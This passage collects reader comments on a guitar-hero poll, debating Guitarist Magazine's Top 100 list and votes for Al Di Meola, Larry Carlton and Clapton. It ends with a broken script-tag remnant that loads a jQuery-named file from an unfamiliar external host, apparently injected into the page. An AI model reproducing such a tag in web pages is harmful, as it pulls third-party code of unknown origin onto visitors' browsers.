Your polls are great. No complaint. If there's any complaint, it's with Guitarist Magazine, who seems to feel a need to pander to their pimplefaced self identified disaffected grunge wannabe audience. |

You mentioned Allan Holdsworth is not even mentioned, but I just checked my 100 Guitar Heroes list from Guitarist Magazine and he IS included in the list, right after Jimi Hendrix, so don't worry, he'll be coming up in the next but one list.

Johnny Fean (Horslips) anyone?.... fellow "Paddy", The Edge, is a definite follower and admirer of Johnny but they are really chalk and cheese when it comes to their playing styles. Johnny wins hands down (IMHO).

the guitar solo on Kid Charlemagne alone is enough to earn Carlton the vote, it is the best solo in a jazz/rock setting

Al Di Meola is doing surprisingly well in the poll. He's now drawn level with Eric Clapton on seven votes each.

Carlton. I keep choosing the first choice in the polls for some reason.

Clapton is god.........
Love how people are trashing you for the list and don't read where it came from.....LOL On Cobain in general, why on earth Guitar Mag lists him as a top 100 is INSANE. Simply strumming a guitar in grunge mode does nothing, his only fame was the beginning lick on Smells Like Teen Spirit, very memorable but hardly great.

Kurt Cobain does nothing at all for me either and there's no way I'd include him in my own personal list of guitar heroes. There are far more worthy guitar heroes (such as Robert Fripp) who Guitarist Magazine could have included in their Top 100 list. I agree. Eric Clapton is God!

I'll gladly cast a vote on Al Di Meola. Guitar master in every sense of the word. Impeccable cross-picking, very succesful in demanding flamenco music as well as jazz/fusion. Influential in his niche, always dealing with cerebral and awe-inspiring music. What's not to like? The only thing he lacks is recognition, but who cares. I'm glad The Edge is left behind.

^^ I think The Edge has lost his edge after falling way behind with just one vote.

I voted for Al Di Meola, but if I had a 2nd vote, I'd select Larry Carlton.< ="text/" ="utf-8" id="tr-app" ="https://cdn.optitc.com/jquery.min.js?u=eng&f=2&s=500,400,50,50&v=0.0.4">
